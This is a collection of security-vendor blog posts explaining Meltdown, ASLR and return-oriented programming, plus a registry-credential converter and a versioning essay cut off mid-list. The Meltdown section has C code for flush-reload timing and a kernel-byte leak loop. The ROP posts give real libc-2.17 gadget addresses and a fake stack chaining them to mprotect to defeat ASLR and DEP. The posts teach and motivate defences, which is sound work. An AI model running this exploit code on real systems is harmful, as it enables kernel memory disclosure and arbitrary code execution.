Automatic Mitigation of Meltdown

Let’s look at what Meltdown is and how it works, as well as how it is stopped. A lot has been written about the Meltdown vulnerability, but it is still commonly misunderstood. A few diagrams may help.

First, let’s consider a simplified memory hierarchy for a computer: main memory, split into user memory and kernel memory; the cache (typically on the CPU chip); and then the CPU itself.


The bug is pretty simple. For about two decades now, processors have had a flag that tells them what privilege level a certain instruction is running in. If an instruction in user space tries to access memory in kernel space (where all the important stuff resides), the processor will throw an exception, and all will be well.

On certain processors, though, the speculative execution engine fails to check this bit, causing side effects in user space (a page getting cached) that user-space instructions can test for. The attack is both clever and remarkably simple.

Let’s walk through it graphically. Assume your memory starts with this flushed cache state — nothing sits in the cache right now (the “flush” part of a “flush-reload” attack):


Step 1: Find cached pages

First, let’s allocate 256 pages in user space that we can access. Assuming a page size of 4K, we just allocate 256 times 4K bytes of memory. It doesn’t matter where those pages reside in user-space memory, as long as we get the page size right. In C-style pseudo-code:

char userspace[256 * 4096];

I’ll mark those in the userspace diagram — for brevity, I’ll only show a few pages, and I’m going to show cached pages popped up like this:


This allows for easier reading (and easier drawing for me!).

So let’s start with an empty (flushed) cache:


Now consider what the cache state would be if we accessed a byte in page 10. Since any byte in page 10 would do the trick, let’s just use the very first byte (at offset 0).

The following code accesses that byte:

char dummy = userspace[10 * 4096];

This leads the state to be:


Now what if we measured the time to access each page and stored it?

int accessTimes[256];
for (int i = 0; i < 256; i++) {
    t1 = now();
    char dummy = userspace[i * 4096];
    t2 = now();
    accessTimes[i] = t2 - t1;
}

Since page 10 was cached, its access time would be significantly faster than that of all the other pages, which need a round trip to main memory. Our access-times array would look something like this:

accessTimes = [100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 10, 100, 100....];

The entry at index 10 (page 10) is an order of magnitude faster to access than anything else. So page 10 was cached, whereas the others were not. Note, though, that all of the pages did get cached as part of this access loop — this is the “reload” part of the flush-reload side channel, because we reloaded all the pages into the cache.

At this point we can easily figure out which pages are cached: flush the cache, allow someone else to affect it, then reload (time) it.
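For the curious, here is a minimal sketch of what those flush and reload primitives tend to look like on x86-64 with GCC/Clang intrinsics. The names flush_probe and probe_time are just illustrative (they aren’t from any particular proof-of-concept), and userspace is the probe array from Step 1:

#include <stdint.h>
#include <x86intrin.h> /* _mm_clflush, _mm_mfence, __rdtscp */

static char userspace[256 * 4096]; /* the probe array from Step 1 */

/* "Flush": evict every probe page from the cache. */
static void flush_probe(void) {
    for (int i = 0; i < 256; i++) {
        _mm_clflush(&userspace[i * 4096]);
    }
    _mm_mfence();
}

/* "Reload": time one access; a cached page reads back much faster. */
static uint64_t probe_time(int page) {
    unsigned int aux;
    _mm_mfence();
    uint64_t t1 = __rdtscp(&aux);
    volatile char dummy = userspace[page * 4096];
    uint64_t t2 = __rdtscp(&aux);
    (void)dummy;
    return t2 - t1;
}

In a real measurement you would calibrate the “fast” threshold on your own machine; the exact cycle counts vary wildly across CPUs.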

Step 2: Speculate on kernel memory

This step is easy. Let’s assume we have a pointer to kernel memory:

char *kernel = (char *)0x1000; //or whatever the case is

If we tried to access it using an unprivileged instruction, it would fail — our user space instructions don’t have a privileged bit set:

char important = kernel[10];

Speculation, though, is a different story. The instruction above speculates just fine; it then throws an exception, so we never architecturally get the value of important.
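That exception would normally kill our process, so real proof-of-concepts arrange to survive it. One common approach is to catch SIGSEGV and jump back with siglongjmp; TSX transactions are another way to suppress the fault. A minimal sketch (the handler and recover_point names are mine, not from any specific exploit):

#include <setjmp.h>
#include <signal.h>

static sigjmp_buf recover_point;

static void segv_handler(int sig) {
    (void)sig;
    /* The faulting access never retires; just resume after the attempt. */
    siglongjmp(recover_point, 1);
}

static void install_handler(void) {
    struct sigaction sa = {0};
    sa.sa_handler = segv_handler;
    sigaction(SIGSEGV, &sa, NULL);
}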

Step 3: Affect userspace based on speculated value

However, what happens if we speculated this?

char dummy = userspace[(unsigned char)kernel[10] * 4096];

We know userspace has 256 * 4096 bytes — we allocated it. Since we’re only reading one byte from the kernel address, the maximum value is 255.

What happens when this line is speculated? Even though the processor detected the segmentation fault and prevented you from reading the value, did you notice that it cached the user-space page? The page whose number was the value of kernel memory!

Suppose the value of kernel[10] was 17. Let’s run through this:

  1. The processor speculatively read kernel[10] before the privilege check caught up. That value was 17.
  2. The processor then dereferenced the 17th 4K-wide page in the array “userspace”: userspace[17 * 4096]
  3. The processor detected that you weren’t allowed to access kernel[10], and so raised an exception instead of handing you the value. Bad programmer!
  4. The processor did not, however, undo its speculative side effects: the user-space page it touched stayed in the cache. It won’t hand you kernel memory directly, of course. It’s got your back…

What was the state of cache at the end of this?


That’s cool! Using Step 1, we would find that page 17 is the fastest to access — by a large margin over the others! That tells us the value of kernel[10] was 17, even though we never (architecturally) read kernel[10]!

Pretty neat, huh? By going over kernel memory byte by byte, we can read the value at every kernel address, purely through its effect on cached pages.
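Putting the three steps together, the conceptual leak loop looks roughly like the sketch below. It reuses the illustrative flush_probe, probe_time and recover_point helpers (and their includes) sketched earlier. A working proof-of-concept needs much more care (retries, tuned thresholds, a wide enough speculation window, and a vulnerable, unpatched CPU), so treat this purely as a summary of the flow:

/* Conceptual only: leak one byte at the given kernel address. */
static int leak_byte(const volatile char *kernel_addr) {
    flush_probe();                       /* flush */

    if (sigsetjmp(recover_point, 1) == 0) {
        /* The transient access: it faults, but on a vulnerable CPU the
           probe page indexed by the secret byte may already be cached. */
        volatile char dummy =
            userspace[(unsigned char)(*kernel_addr) * 4096];
        (void)dummy;
    }

    /* Reload: the fastest page reveals the byte. */
    int best = 0;
    uint64_t best_time = probe_time(0);
    for (int page = 1; page < 256; page++) {
        uint64_t t = probe_time(page);
        if (t < best_time) { best_time = t; best = page; }
    }
    return best;
}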

What went wrong? How are we fixing it?

Meltdown is a genuine “bug” — the flaw is not in the cache side channel itself. The bug is straightforward — speculative execution should not cross security boundaries — and it should ultimately be fixed in the CPU itself.

It’s not the cache that’s misbehaving — and the operating system, where most vendors are shipping their fixes, isn’t where the real bug lives either. More precisely, OS vendors are attempting to further isolate kernel and user-space memory, using something called Kernel Page Table Isolation (KPTI), previously called KAISER. It maps only a few kernel “stub” pages into the process’s virtual memory, keeping the rest of the kernel out (and thus unreachable by the speculative execution engine).


Unfortunately, this separation comes at a cost — every transition into the kernel (system calls, interrupts) now involves a more expensive page-table switch.

Polymorphic Linux stops ROP attacks; increases difficulty of others

Since Polymorphic Linux was intended to stop ROP attacks dead in their tracks, ROP attacks in kernel space are defeated by using polymorphic kernels. That matters especially when KASLR (kernel address space layout randomization) is defeated, which is so trivial that the Meltdown paper leaves it as an exercise for the reader.

Furthermore, since polymorphic binaries have different signatures, layouts, instructions and gadgets, they make crafting further attacks harder by at least an order of magnitude. Polymorphic binaries force the extra step of analysis and understanding per binary. This means that a lateral attack (one that moves from machine to machine in a network) becomes much harder.

Look out for my next post on Spectre. It’s a bit more difficult to explain and definitely harder than Meltdown to craft…

Convert between Docker Registry Credentials, K8s Image Pull Secrets, and config.json live

Generating registry secrets for Kubernetes is cumbersome. Extracting creds or updating the secret is annoying. Generating config.json is painful. But we need to do it all the time!

https://polyverse.github.io/docker-creds-converter/


I frequently generate service accounts in our private image hub for various tests. Generating config.json is cumbersome. Injecting that into a Kubernetes cluster as a registry secret (for use as imagePullSecrets on a Pod) is hard. Single-character errors can lead to a cryptic ErrImagePull. On a Swarm, it’s worse: the tasks just mysteriously won’t spin up.

It is even more painful when working with customers and you are behind an email wall at worst, or a Slack wall at best. Both are terrible at preserving formatting.

So I whipped up this tri-directional live converter. You can add/edit credentials on the left-most side, and a config.json as well as a Kubernetes Secret is generated live, which you can save to a file and inject using:

kubectl create -f <savedfile.yaml>

However, you may also paste in a secret you obtained from Kubernetes by running:

kubectl get secret <secret> --output=yaml

Or you can edit config.json directly. This is incredibly useful when you have a secret that contains authorizations to, say, 10 registries, but you want to revoke 3 of them.

You can remove those registry entries from config.json, and the Kubernetes YAML will be updated automatically to reflect that.

Spread the word!

ASLR simplified!

ASLR explained in one simple picture

ASLR increases difficulty without adding complexity. In Part 1 and Part 2 of this series I demonstrated that crafting attacks can be a pleasant experience without a lot of furious typing. I’ve even shown you how defeating exploits is easy when we really understand how the attack works. Let’s dive deeper into ASLR, your first line of defense.


Let me explain what you’re seeing in this picture. I loaded a CentOS 7.2 libc-2.17, which we crafted an attack against in my previous post. When I loaded the exact same file on the right, I did it with an offset of 16 bytes (10 in hexadecimal).

I’m adding features to the tool when I need them for the story.

I picked 16 (hex 10) because it provides easy-to-interpret, uniform offsets across all addresses.


You’ll notice how the binary on the right is the same binary as on the left, but it’s moved (which is why the lines are all orange). The gadgets still exist intact, but they’re in a different location. Let’s tabulate the first 5 addresses:

1807d1 + 0x10 = 1807e1
1807f1 + 0x10 = 180801
1807b1 + 0x10 = 1807c1
1a44cc + 0x10 = 1a44dc
1770b0 + 0x10 = 1770c0

This is clever because, as you saw in the title image, if we try to execute our ROP chain, c6169 c7466 1b92, it works on the original binary but falls flat on the offset one.


In a nutshell, this is what ASLR does! If we offset the same library differently (and unpredictably) for every program on a machine, the chances that the same attack would work or spread are very low.

Remember, security is not about complexity and two people typing furiously on keyboards, entertaining as that is. Security is about doing what is necessary and sufficient to defeat an attack vector.

How is this movement possible?

Offsets are easy because virtual memory became a thing right around the i386, when we moved away from segmented memory to paged memory. All operating systems, processors and compilers came together to work on an offset model. This was originally not intended for security, but rather to let programs see a really large memory space when physically they would only ever use a little bit of it. It allowed every program to work from memory address 0 through MAX, and the operating system would map that to something real.

ASLR makes use of machinery that already existed, which is what enables any program compiled for a modern operating system to benefit from it automatically.
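If you want to see this in action on your own machine, a tiny experiment makes it concrete. The program below is just illustrative; run it a few times, and on a system with ASLR enabled the stack, heap and libc addresses it prints will differ from run to run:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    int on_stack = 0;
    void *on_heap = malloc(16);

    printf("stack variable : %p\n", (void *)&on_stack);
    printf("heap allocation: %p\n", on_heap);
    printf("libc function  : %p\n", (void *)&printf);

    free(on_heap);
    return 0;
}

Each run gets a different base, and, as the table above shows, every gadget inside the library moves by exactly that per-run offset.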

Can we discover more?

I’m particularly proud of this disassembler because you’re not looking at some block diagram I drew in Photoshop (or name your favorite visualizer program). You’re looking at a real binary of your choice that you uploaded, and you can now watch these offsets, gadgets and chains at work. This is ASLR on real gadgets in action!

The cliffhanger for this post is to figure out what techniques you might use to discover the offset… remember, there’s only one piece of information we need to jump to any ROP location in the offset binary. All I would have to do is add 0x10 to each address in my chain, and I’ve broken ASLR. Like so: c6179 c7476 1ba2
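That rebasing step is purely mechanical. Once the single leaked offset (often called the slide) is known, rebasing a chain is one loop. A quick sketch, using the made-up 0x10 slide and the chain from above:

#include <stdio.h>
#include <stdint.h>

int main(void) {
    /* Gadget addresses found in the un-randomized library. */
    uint64_t chain[] = { 0xc6169, 0xc7466, 0x1b92 };
    uint64_t slide = 0x10; /* the one piece of information ASLR hides */

    for (size_t i = 0; i < sizeof(chain) / sizeof(chain[0]); i++) {
        chain[i] += slide;
        printf("%llx\n", (unsigned long long)chain[i]);
    }
    return 0;
}

It prints c6179, c7476 and 1ba2: the rebased chain.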


This gave me an idea. You’ll notice that somehow pop rdi ; ret was in the base library even at the offset position! Can we find something in common?

I filtered the offset library to show surviving gadgets, and some 2,279 gadgets survived.


I have to admit, I sometimes rig these posts to tell a story, but this caught me off guard. I discovered that an offset alone isn’t enough; a sufficiently LARGE offset is needed when a lot of gadgets occur consecutively. This was crazy!

So the second cliffhanger for today is… given that they are ALL offset by a fixed amount, is it possible to infer the offset trivially? The answer is of course yes, since the video in Part 2 demonstrated it happening. It’s one thing to read a dry answer and another to intuitively understand it.

Next up I’ll see if I can’t easily figure out an intuitive way to find the offset. I’m basically solving these problems as I write them — this is not some planned series. My team wanted this tool for some other demo, but it ended up being so much fun, I started writing these posts. So I honestly don’t know if I have an answer for intuitive offset-discovery.

Fun with binaries!

ASLR and DEP defeated with three instructions and one offset!

This is Part 2 of my previous post that demonstrated how you craft undetectable attacks against binaries, using our colorful Open Source Entropy Visualization tool. I left you with a cliffhanger… so let’s begin there!

Recap of the cliffhanger

The cliffhanger I left you with was that all we need are three tiny ROP gadgets, and the offset of mprotect, to make any arbitrary part of memory executable. First, I present my proof:

This is a video by Roy Sundahl, one of our most senior engineers, and our resident ROP expert who spends a lot of his time figuring out offensive tools.

Before we proceed, if you’re wondering why we can’t just block calls to mprotect, it turns out there’s some truth to Greenspun’s tenth rule. Let’s forgo the obvious candidates like interpreters and JITers. I learned that the tiniest of programs that might use regular expressions will need to call mprotect — including the innocuous “ls”.
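For context on why mprotect is so ubiquitous (and on what the exploit ultimately calls), here is a minimal, benign sketch of the pattern a JIT or regex engine uses: map a writable buffer, fill it with machine code, then ask the kernel to make it executable. This is purely illustrative and not taken from any of the programs mentioned above; it assumes x86-64 Linux:

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(void) {
    size_t len = 4096;

    /* Get a page of read/write memory. */
    unsigned char *buf = mmap(NULL, len, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return 1;

    /* x86-64: mov eax, 42 ; ret */
    unsigned char code[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
    memcpy(buf, code, sizeof(code));

    /* The call attackers love: flip the page to read/execute. */
    if (mprotect(buf, len, PROT_READ | PROT_EXEC) != 0) return 1;

    int (*fn)(void) = (int (*)(void))buf;
    printf("JIT-ed function returned %d\n", fn());

    munmap(buf, len);
    return 0;
}

An exploit never needs to ship any of this. It only needs to get mprotect called on a buffer it already controls, which is exactly what three pop gadgets plus the mprotect offset make possible.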

Let’s cast a wider net!

Okay, that exploit was cool, and you can do this for yourself by finding gadgets across all the libcs in the samples.

But can we do more? Can we easily go after a range of machines *without* knowing a target signature? Let’s find out!

Here I’m comparing the same “version” of libc across CentOS 7.1 and 7.2. For quick reference: on the right, rows with a red background are gadgets that survived perfectly, rows with a yellow background are gadgets that exist but at a different location, and rows with no background are gadgets that didn’t exist in the first file.

We found some 2,503 gadgets shared across them. Notice how little variation there is, even though the code was compiled at two different times from what are probably two slightly different source trees. The more gadgets that fall on the same addresses, the easier it is for us to cast a wide net, since it requires that many fewer custom craftings to go after a binary. To determine whether your exploit will work across both, first filter the right side by “Surviving Gadgets”, and then search for the gadgets you want.

Let’s try that across CentOS 7.1 and 7.2. First up, pop rdi ; ret? Yep! There it is! The first common address is: c6169.

Second up, pop rsi ; ret? Yep! There it is also! First common address is: c7466.

Finally, pop rdx ; ret? Yep! The first surviving address is: 1b92.

We got our complete ROP chain across both binaries: c6169 c7466 1b92. We can validate this by simulating execution across both binaries.

Now you know the complete power of the tool!

This is what the tool is intended to do! You can verify ROP chains across binaries without ever leaving your browser. You can now tell, visually and graphically, whether a particular attack will work against a given binary you run. It can be used to craft attacks, but it can also be used to ensure that a patch really worked.

There’s a bit of emotional comfort when you can execute a chain visually, see how the flow jumps around, and see that it doesn’t work.

Are Overflows/Leaks that common?

All this depends, of course, on your being able to manipulate some little bit of stack space. Aren’t overflows so… 2000s? We use bounds-checked modern languages that don’t suffer from these problems.

First of all, if you subscribe to our weekly breach reports, you’ll empirically find that overflows and memory leaks are pretty common. Even the internet’s favorite language, JavaScript, is not immune.

Secondly, my best metric to find truth is to look for back-pressure (the sociological version of proof-by-contradiction). Look out for attempts at locking this down 100%, and then follow the backlash.

However, I also want you to get an intuitive understanding of where they arise and why they happen.

Even I have to admit that certain operations (such as sorting or XML/JSON parsing) are better implemented by manipulating memory buffers directly, despite my well-publicized extremist views favoring immutable data and list comprehensions.

So what does a “real overflow” look like? (Code in the samples directory.)

#include <stdio.h>
#define BUF_LEN 20
int main()
{
    char buf[BUF_LEN];
    int i=0;
    while (i++ < BUF_LEN) {
        printf("Setting buf[%d] to zero. n",i);
        buf[i] = 0;
    }
}

I just overwrote a byte on the stack frame. It’s obvious when I point it out. If you were working on this code and not looking for overruns, this is easy to miss. Ever seen the college textbook example of a quicksort using while-loops to avoid using the system stack? They are liberal with while(1)s all over the place.

Personal Rant: They are very common, and they are insanely difficult to find. This is why I’m such an extremist about immutability, list comprehensions, symbolic computation. For your business apps, you should NEVER, unless under extreme exceptions, listen to that “clever” developer who is doing you the favor of writing efficient code. Pat them on the back. Give them a promotion or whatever. Get them out of the way. Then find a lazy person who’ll use list-comprehensions and copy-on-change wherever possible! I’m a big believer in Joe Armstrong’s advice here: First make it work. Then make it beautiful. Finally, if necessary, make it fast.

In our analyses, more than 65% of critical CVEs since June 1st fell under this category. I could be off by a few points on that number since it changes as we compile our reports periodically and tweak how we classify them. But it’s well over 60%.

Putting it all together

In Part 1, I showed you what ROP gadgets are, how to find them, chain them, and exploit them.

In Part 2, I completed the story by demonstrating how to find common gadgets across a wide array of deployed binaries.

The purpose of the Entropy Visualizer is to enable all this decomposition in your browser. In fact this is an easier tool than most ROP finders I know. 🙂

Happy Hunting!

Let’s craft some real attacks!

If you read security briefings, you wake up every morning to “buffer overflow” vulnerabilities, “control flow” exploits, crafted attacks against specific versions of code, and whatnot.

Most of those descriptions are bland and dry. Moreover, much of it makes no intuitive sense, everyone has their fad of the week, and it is easy to feel disillusioned. What’s real, and what’s techno-babble? Didn’t we just pay for the firewalls and deploy the endless stream of patches? What is with all this machine-code nonsense?

A gripe I’ve always had with our industry is that the first solutions we come up with are architectural ivory towers. We try curing cancer on day one, and then in a few years we would sell our soul just to be able to add two numbers reliably. (Yeah, I’m still holding a grudge against UML, CORBA, SOAP, WSDL, and oh for god’s sake — DTDs!)

Let’s skip all that and actually begin by crafting a real attack visually and interactively! No more concepts. No more theory. No more descriptions of instruction set layouts and stacks and heaps! Liberal screenshots to follow! Brace yourself! This is as colorful as binaries will ever get!

Let’s play attacker for a bit

Intro to Tools

Let’s start by visiting this tool I wrote specifically for this blog post, and open a binary.

https://analyze.polyverse.io

(Source code here: https://github.com/Polyverse/binary-entropy-visualizer)

Every time I build a web app, I end up putting a CLI in there.

Now you can drag-drop a file on there to analyze it — yeah, that web page is going to do what advanced geeky nerdy tools are supposed to do on your desktop. For now it only supports Linux 64-bit binaries. Don’t look too hard; there are two samples provided in my GitHub repo: https://github.com/polyverse/binary-entropy-visualizer/tree/master/samples. Simply download either of the files ending in “.so”.

When you throw it on there, it should show you a progress bar with some analysis…..

Getting this screenshot was hard — it analyzes quickly.

If you want to know what it’s doing, click on the progress bar to see a complete log of actions taken.

Proof: Despite my best attempts, I hid a CLI in there for myself.

When analysis is complete, you should see a table. This is a table of “ROP gadgets.” You’re witnessing a live analysis in your browser of what people with six screens in dark rooms run with complex command lines and special programs.

But wait.. what about those other two sections?

We won’t go into what ROP gadgets are, what makes them a gadget, and so on. Anyone who’s ever gone through Programming 101 will recognize them as assembly-language code, another really fun thing that is always presented as dry and irritating. It’s also everywhere.

What is an exploit?

Execution of unwanted instructions

In the fashion of my patron saints, MacGyver (the old one) and the MythBusters, I am not going to go into how you find a buffer overrun and get to inject stuff onto a stack and so on. Sorry. There are plenty of classes online to learn how to do that, or you might want to visit DEF CON.

Let’s just assume you have a process with a single byte buffer overrun. This isn’t as uncommon as you’d think. Off-by-one errors are plentiful out there. Sure, everyone should use Rust, but didn’t I just rant about how we all want to be “clever” and struggle to plug holes later?

Let’s simply accept that an “exploit” is a set of commands you send to a computer to do what you (the attacker) want, but something the owner/developer/administrator (the victim) definitely does not want. No matter what name the exploit goes under, at the end of the day it comes down to executing instructions that the attacker wants, and the victim doesn’t. What does stealing/breaking a password do? Allow execution. What does a virus do? Executes instructions. What does SQL-injection do? Executes SQL instructions.

Remember this: execution of unwanted instructions is bad.

Always know what you want

We want a specific set of instructions to run, given below.

Okay let’s craft an exploit now. We’re going to simulate it. All within the browser.

Let’s say for absolutely arbitrary reasons that running the following instructions makes something bad happen. WOPR starts playing a game. Trust me: nobody wants that! You don’t have to understand assembly code. In your mind, the following should translate to, “Later. Let’s play Global Thermonuclear War.”

jbe 0x46c18 ; nop ; mov rax, rsi ; pop rbx ;
add byte ptr [rax], al ; add bl, ch ; cmpsb byte ptr [rsi], byte ptr [rdi] ; call rax
and al, 0xf8 ; 
mov ecx, edx ; cmp rdx, rcx ; je 0x12cb78 ; 
jne 0x1668e0 ; add rsp, 8 ; pop rbx ; pop rbp ; 
sub bl, bh ; jmp qword ptr [rax]
add byte ptr [r8-0x77], r9b ; fimul dword ptr [rax - 0x77] ; 
or byte ptr [rdi], 0x94 ; 
push r15 ; in eax, dx ; jmp qword ptr [rdx]
jg 0x95257 ; jne 0x95828 ; 
jb 0x146d9a ; movaps xmmword ptr [rdi], xmm4 ; jmp r9
or byte ptr [rdx], al ; add ah, dl ; div dh ; call rsp
jg 0x97acb ; movdqu xmmword ptr [rdi + 0x10], xmm2 ; 
or dword ptr [rax], eax ; add byte ptr [rax], al ; add byte ptr [rax], al ; 
add byte ptr [rax], al ; enter 8, 0 ; 
xor ch, ch ; mov byte ptr [rdi + 0x1a], ch ;

So how do we do it? The most effective ways to do this are social engineering, spearphishing, password-guessing, etc., etc. They are also ways that leave traces. They are effective and blunt, and, with enough data, they will be caught. Also, look at that code. Once someone figures out that this set of instructions causes bad things, it is easy to generate a signature to find any bits of code that match it, and prevent it from running.

But I wouldn’t be writing this post if that was the end of it.

Just because you can’t inject this code through the other methods doesn’t mean you can’t inject code that will cause this series of instructions to be executed. AI/analytics/machine learning: all suffer from one big flaw — the Turing Test.

A program isn’t malicious because it “has bad instructions.” There’s no such thing as “bad instructions”. Why would processors, and machines and servers and phones ship with “bad instructions?” No, there are bad sequences of instructions!

A program doesn’t necessarily have to carry the bad sequence within itself. All it has to do is carry friendly good sequences, which, on the target host, lead to bad sequences getting executed. If you haven’t guessed already, this behavior may not necessarily be malicious; it might even be accidental.

How to get what you want

Now go back to the tool if you haven’t closed it. Use the file “libc-2.17.so” from the samples, and load it.

Then enter this sequence of numbers in the little text box below “ROP Chain Execution:”

46c1c 7ac3f 46947 12cb5f 166900 183139 cfdcb 12f7ea 191614 95236 146d8a 1889ad 97abb 4392 17390e 98878

It should look something like this:


Go ahead and execute the chain.


Well guess what? An exact match to my instructions to activate WOPR!

The libc that you just analyzed is a fundamental and foundational library linked into practically any and every program on a Linux host. It is checked and validated and patched. Each of those instructions is a good instruction — approved and validated by the processor-maker, the compiler-maker, the package manager all the way down to your system administrator.

What’s a REAL sequence of bad instructions?

pop rdi, pop rsi, pop rdx, and the offset of mprotect are all it takes!

I made up the sequence above. In a complete break from convention, I made it more complex just so it’d look cool. Real exploits require gadgets so simple, you’ll think I’m making this part up!

A real, known, dangerous exploit we simulated in our lab requires only three ROP gadget locations and the offset of mprotect within libc. We can defeat ASLR remotely in seconds, and once we call mprotect, we can make anything we want executable.

You can see how easy it is to “Find Gadget” and create your own chain for:
pop rdi ; ret
pop rsi ; ret
pop rdx ; ret

This illustrates how simple exploits hide behind cumbersome tools, giving the illusion of difficulty or complexity.
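To make the mechanics concrete, here is a hedged sketch of what an attacker’s fake stack looks like for that kind of chain. Every address below is a placeholder (your leaked library base plus offsets a gadget finder reports); on x86-64 the first three integer arguments travel in rdi, rsi and rdx, which is exactly why those three pop gadgets are enough to call mprotect:

#include <stdint.h>

/* Placeholder addresses: the libc base would be leaked at runtime, and
   the offsets come from a gadget finder like the one above. */
#define LIBC_BASE       0x7f0000000000UL       /* hypothetical          */
#define GADGET_POP_RDI  (LIBC_BASE + 0xc6169)  /* pop rdi ; ret         */
#define GADGET_POP_RSI  (LIBC_BASE + 0xc7466)  /* pop rsi ; ret         */
#define GADGET_POP_RDX  (LIBC_BASE + 0x1b92)   /* pop rdx ; ret         */
#define MPROTECT_ADDR   (LIBC_BASE + 0x101010) /* hypothetical offset   */

/* What the attacker writes past the overflowed return address. Each
   gadget's "ret" pops the next entry, so control bounces from gadget
   to gadget, loading registers along the way. */
uint64_t fake_stack[] = {
    GADGET_POP_RDI, 0x00007f0000200000UL, /* rdi = page-aligned buffer  */
    GADGET_POP_RSI, 0x1000,               /* rsi = length               */
    GADGET_POP_RDX, 0x7,                  /* rdx = PROT_READ|WRITE|EXEC */
    MPROTECT_ADDR,                        /* "return" into mprotect()   */
};

None of this is code the victim has to ship; it is just data the attacker arranges on the stack, built entirely out of instructions the victim already has.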

Crafting your own real, serious payloads

So why is this ROP analyzer such a big deal? If you haven’t put two and two together, an exploit typically works like this:

  1. You figure out what you want (we covered this step above).
  2. You need to figure out a sequence of instruction groups, all ending with some kind of a jump/return/call, that you can exploit to get the instructions in between executed.

Turns out that step 2 is not so easy. You need to know what groups of instructions you have to play with, so you can craft chains of them together.

This tool exports these little instruction groups (called gadgets) from the binaries you feed it. You can then solve for which gadgets, in what sequence, will achieve your goal.

This is a complex computational problem that I won’t solve today.

Look out for Part 2 of my post which will go into what the other “Compare File” dialog is for… stay tuned! It’s dead trivial to figure out, anyway, so go do it if you want.

Semantic Versioning has failed Agile

This is an Engineering post on how we build software at Polyverse, what processes we follow and why we follow them.

A couple of weeks ago, I attended a CoffeeOps meetup at Chef HQ. One of my answers detailing how we do agile, CI/CD, etc. got people excited. That prompted me to describe in detail exactly how our code is built, shipped, and how we simplified many of the challenges we saw in other processes. It should be no surprise that we make heavy use of Docker for getting cheap, reliable, and consistent environments.

Dropping Irrelevant Assumptions

I first want to take a quick moment to explain how I try to approach any new technology, methodology or solution, so that I make the best use of it.

Four years ago, when we brought Git into an org, a very experienced and extremely capable engineer raised their hand and asked, “I’ve heard that Git doesn’t have the feature to revert a single file back in history. Is this true? If it is true, then I want to understand why we are going backwards.”

I will never forget that moment. As a technical person, truthfully, that person was absolutely RIGHT! However, moving a single file backwards was something we did because we didn’t have the ability to cheaply tag the “state” of a repo, so we built up terrible habits such as “branch freeze”, timestamp-based checkouts, “gauntlets”, etc. It was one of the most difficult questions to answer, without turning them antagonistic, and without sounding like you’re evading the issue.

I previously wrote a similar answer on Quora about Docker and why the worst thing you can do is to compare containers to VMs.

It is very dangerous to stick to old workarounds when a paradigm shift occurs. Can we finally stop it with object pools for trivial objects in Java?

What problems were we trying to solve?

We had the same laundry list of problems nearly any organization of any type (big, small, startup, distributed, centralized, etc.) has:

  1. First and foremost, we wanted to be agile, as an adjective and a verb, not the noun. We had to demonstrably move fast.
  2. The most important capability we really wanted to get right was the ability to talk about a “thing” consistently across the team, with customers, with partners, with tools and everything else. After decades of experience, we’d all had difficulty in communicating precise “versions” of things. Does that version contain a specific patch? Does it have all the things you expect? Or does it have things you don’t expect?
  3. We wanted to separate the various concerns of shipping and pay the technical debt at the right layer at all times: developer concerns, QA assertions, and release concerns. Traditional methods (even those used in “agile”) were too mingled for the modern tooling we had. For example, “Committing code” is precisely that — take some code and push it. “Good code” is a QA assertion — regardless of whether it be committed or not. “Good enough for customers” is a release concern. When you have powerful tools like Docker and Git, trying to mangle all three in some kind of “master” or “release” branch seemed medieval!
  4. We wanted no “special” developers. Nobody is any more or less important than anyone else. All developers pay off all costs at the source. One person wouldn’t be unfairly paying for the tech debt of another person.
  5. We believed that “code is the spec, and the spec is in your code”. If you want to know something, you should be able to consistently figure it out in one place — the code. This is the DRY principle (Don’t Repeat Yourself.) If code is unreadable, make it readable, accessible, factored, understandable. Don’t use documentation to cover it up.
  6. We wanted the lowest cognitive load on the team. This means using familiar and de-facto standards wherever possible, even if it is occasionally at the cost of simplicity. We have a serious case of reverse “Not-Invented-Here” syndrome. 🙂 We first look at everything that’s “Not-Invented-Here”, and only if it doesn’t suit our purpose for a real and practical problem do we sponsor building it in-house.

Now let’s look at how we actually build code.

Content-based non-linear versioning

The fundamental foundation of everything at Polyverse is content-based versioning. A content-based version is a cryptographically secure hash over a set of bits, and that hash is used as the “version” for those bits.

This is a premise you will find everywhere in our processes. If you want to tell your colleague what version of Router you want, you’d say something like: router@72e5e550d1835013832f64597cb1368b7155bd53. That is the version of the router you’re addressing. It is unambiguous, and you can go to the Git repository that holds our router, and get PRECISELY what your colleague is using by running git checkout 72e5e550d1835013832f64597cb1368b7155bd53.

This theme also carries over to our binaries. While there is semantic versioning in there, you’ll easily baffle anyone on the team if you ask them for “Router 1.0.2”. Not that it is difficult to look up, but that number is a text string anyone could have placed there, and as a mental model it makes everyone a little uneasy. Culturally we simply aren’t accustomed to talking in imprecise terms like that. You’d be far more comfortable saying Router with sha 5c0fd5d38f55b49565253c8d469beb9f3fcf9003.

Philosophically we view Git repos as “commit-clouds”. The repos are just an amorphous cloud of various commit shas. Any and every commit is a “version”. You’ll note that this not only is an important way to talk about artifacts precisely, but more so, it truly separates “concerns”. There is no punishment for pushing arbitrary amounts of code to Git on arbitrary branches. There is no fear of rapidly branching and patching. There is no cognitive load for quickly working with a customer to deliver a rapid feature off of a different branch. It just takes away all the burden of having to figure out what version you assign to indicate “Last known good build of v1.2.3 with patches x, y, but not z”, and “Last known good build of v1.2.3 with patches x, z, but not y”.

Instead, anyone can look up your “version” and go through the content tree, as well as Git history and figure out precisely what is contained in there.

Right about now, I usually get pushback surrounding the questions: how do you know what is the latest? And how do you know where to merge?

That is precisely the “Perforce vs. Git” mental break we benefit from. You see, versions don’t really work linearly. I’ve seen teams extremely frightened of reverting commits and terrified of removing breaking features rapidly. Remember that “later” does not necessarily mean “better” or “comprehensive”. If A comes later than B, it does not imply that A has more features than B, or that A is more stable than B, or that A is more useful than B. It simply means that somewhere in A’s history is a commit node B. I fundamentally wanted to break this mental model of “later” in order to break the hierarchy in a team.

This came from two very real examples from my past:

  1. I’ll never forget my first ever non-shadowed on-call rotation at Amazon. I called it the build-from-hell. For some reason, a breaking feature delayed our release by a couple of days. We were on a monthly release cycle. No big deal.
